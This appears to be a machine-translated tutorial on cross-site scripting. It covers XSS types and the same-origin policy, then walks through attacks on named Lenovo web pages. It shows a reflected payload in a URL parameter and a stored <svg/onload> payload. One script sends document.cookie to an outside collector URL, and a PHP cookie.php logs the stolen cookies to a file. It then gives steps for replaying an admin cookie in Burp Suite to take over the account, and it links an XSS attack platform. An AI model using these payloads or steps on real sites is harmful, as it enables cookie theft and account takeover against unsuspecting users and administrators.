XSS scripting attacks

XSS scripting attacks are more than just alert (1) even if It's over, the real use of XSS scripting attacks is to steal ordinary users ' cookies. Or steal the administrator's cookie.

XSS classification (type):

1. Reflection Type XSS

2, Storage-type XSS

3. DOM type XSS

XSS Classification (code):

1. XSS injs Code

2. XSS in the event

3 . XSS in HTML

4, External introduction of XSS

Speaking of external introduction, talk about the same-origin policy and cross-domain requests

Homologous policy:

A well- known security policy proposed by Netscape , now all JavaScript -enabled browsers use this strategy, so-called homology means: protocol, domain name, the same port.

Why do we need homologous strategy?

Suppose there is no homologous strategy now, what will happen? As you know,JavaScript can do a lot of things, like reading / Modifying a value in a webpage. Well, now that you've opened the browser, opened the bank's website in a tab window, opened a malicious website in another tab window, and that malicious website hangs a specially modified bank information JavaScript,when you visit this malicious website and execute it javascript , your bank page will be the JavaScript changes, the consequences will be very serious ! And the homologous strategy is to prevent this from happening.

For example, two browsersTabpage, open thehttp://www.baidu.com/index.htmland thehttp://www.google.com/index.html, of which,JavaScript1and theJAVASCRIPT3is a script belonging to Baidu, andJavaScript2is a script belonging to Google, when the browser'sTAB1to run a script, a homology check is performed, and only thewww.baidu.comthe same-origin script can be executed。 SoTAB1can only performJavaScript1and theJAVASCRIPT3script, andJavaScript2cannot be enforced, thereby preventing illegal tampering of this webpage by other Web pages.

In this case, you should understand what the homologous strategy means.

Cross-domain requests, you can use the src attribute of the <script> tag, so that you can introduce external JS Code, Achieve the purpose of bypassing the same-origin policy restrictions.

Now the browser, basically have homologous strategy,XSS Attack Prevention, we can study under.

XSS Attack Platform:

http://xsser.me/

cookiescan be stolen through the platform, or they can be stolen from servers under their control .

Example 1, local XSS

Directly in the browser input: Javascript:alert (Document.cookie), can be the current page of the cookie pop out, if you want to bounce the value of a variable in the current page, the direct alert ( variable ) .

Example 2, Lenovo Weixin Station reflection type XSS

To open Firefox, enter:

http://weixin.lenovo.com/weixin/index.php/faq/faqdetail?faq_title_id=11111111

Look at the source code, you can see that the input data has been exported to the <script> tag range, at this time, we do not have to worry about the construction of <script> tag Things, We can directly test single quotes, double quotes, semicolons,alert,prompt, and so on whether these keywords are filtered or encoded!

Input:

Http://weixin.lenovo.com/weixin/index.php/faq/faqdetail?faq_title_id=1 ' 2 "3 (4;5alert6prompt

Execute, View source code:

var title_id = ' 1 ' 2 "3 (4;5alert6prompt ';

As can be seen, the double quotation marks are encoded as: ", however, single quotation marks can be used, and, here the semicolon and//comment are also used, the keyword alert is not filtered.

So, construct the input:

http://weixin.lenovo.com/weixin/index.php/faq/faqdetail?faq_title_id=111 '; alert (1)//

Play the window decisively!

At this point, view the source code, XSS playload as follows:

var title_id = ' 111 '; alert (1)//';

Equivalent to:

var title_id = ' 111 ';

Alert (1)

：

In fact,XSS Vulnerability Mining, in essence, or in the knowledge of the principle of XSS vulnerabilities, familiar with js code. In addition, there is no other shortcut! Of course,XSS Vulnerability mining skills are very important!

Example 3, Lenovo ask store-based XSS

Open Firefox, input:http://ask.lenovo.com.cn/html/index.html

Register, login, post:

Details of the posts:

Add question:<svg/onload=alert (1) >// This is the input key point for XSS

Detailed Description:123// fill in here just fine

：

Post:

Just pop the window:

At this time

If, change <svg/onload=alert (1) > to <svg/onload=alert (document.cookie) >, The current user's cookie will pop up.

Further

If, change <svg/onload=alert (Document.cookie) > to the following code:

<script>

document.location = ' http://baidu.com/cookie.php?cookie= ' + document.cookie;

</script>

At this point, the cookie.php source code under thebaidu.com server web root directory is as follows:

<?php

$cookie = $_get[' Cookie '];

$log = fopen ("Cookie.txt", "a");

Fwrite ($log, $cookie. " \ n ");

Fclose ($log);

?>

As you can see, with these two pieces of code, we can collect all the cookies that access the user of the XSS page .

Also, all the cookies that are collected are saved to the baidu.com server web root directory cookie.txt file.

If theask Station has a large amount of traffic, thenthere are more cookies in thecookie.txt file, in other words, the size of the site traffic directly determines our collection How much the cookie is!

Of course, this is only a case of PHP Code Collection cookie , Other language code can also collect cookies, according to the specific Server environment, choose a different collection Cookies the code.

What did we do with him after we collected the cookie?

Of course is to deceive ordinary users, or administrators!

If it is an ordinary user's cookie, we can deceive the ordinary user

If it's an administrator cookie, we can cheat the administrator.

For example, Lenovo ask station

The specific process of deception is as follows:

1, register a normal user, such as:Xsser

2, successful login to the ordinary user once, the server will be in the ordinary user's local generation of the user's corresponding cookie

3. Log in to the normal user again and use burpsuite to crawl the login request Packet

4, you can see:http header xsser user corresponding cookie field and cookie value

5, this value, is the xsser user at the ask station corresponding cookie value

6. Use the cookie value of the ask station admin user to replace the xsser user 's Cookies value

7. After the replacement is complete, submit the login Request packet using burpsuite

8, admin User Login Success!

To this, we even cheat the admin User, successfully logged in!

If, theadmin User is the ordinary user, then, does not have much much use,xsser is the ordinary user!

If, theadmin User is the administrator user, then, at this time, we are the ask station Administrator!

Example 4, Dom XSS

Simply put , Dom XSS is an XSStriggered by the JS Code of the HTML page itself, bypassing the browser and WAF defenses .

I have not found the specific example, we can study it by ourselves.

XSS scripting attacks